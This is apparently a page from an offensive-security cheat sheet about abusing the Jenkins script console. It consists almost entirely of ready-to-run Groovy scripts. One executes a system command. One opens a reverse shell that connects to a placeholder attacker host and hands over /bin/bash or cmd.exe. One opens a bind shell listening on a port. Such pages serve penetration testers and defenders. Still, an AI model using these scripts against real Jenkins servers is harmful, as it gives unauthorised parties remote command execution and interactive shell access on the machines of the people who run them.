Twitter GitHub Blog Sponsor

Jenkins

Script Console Abuse

Execute command:

exec.groovy
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell:

reverse.groovy
String host = "<LHOST>";
int port = <LPORT>;
String cmd = "/bin/bash"; // or "cmd.exe" for Windows

Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);

InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();

while (!s.isClosed()) {
    while (pi.available() > 0)
        so.write(pi.read());
    while (pe.available() > 0)
        so.write(pe.read());
    while (si.available() > 0)
        po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {
        p.exitValue();
        break;
    } catch (Exception e) {}
};

p.destroy();
s.close();

Bind shell:

bind.groovy
int port = <LPORT>;
String cmd="/bin/bash"; // or "cmd.exe" for Windows

Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new java.net.ServerSocket(port).accept();

InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();

while (!s.isClosed()) {
    while (pi.available() > 0)
        so.write(pi.read());
    while (pe.available() > 0)
        so.write(pe.read());
    while (si.available() > 0)
        po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {
        p.exitValue();
        break;
    } catch (Exception e) {}
};

p.destroy();
s.close();

Last updated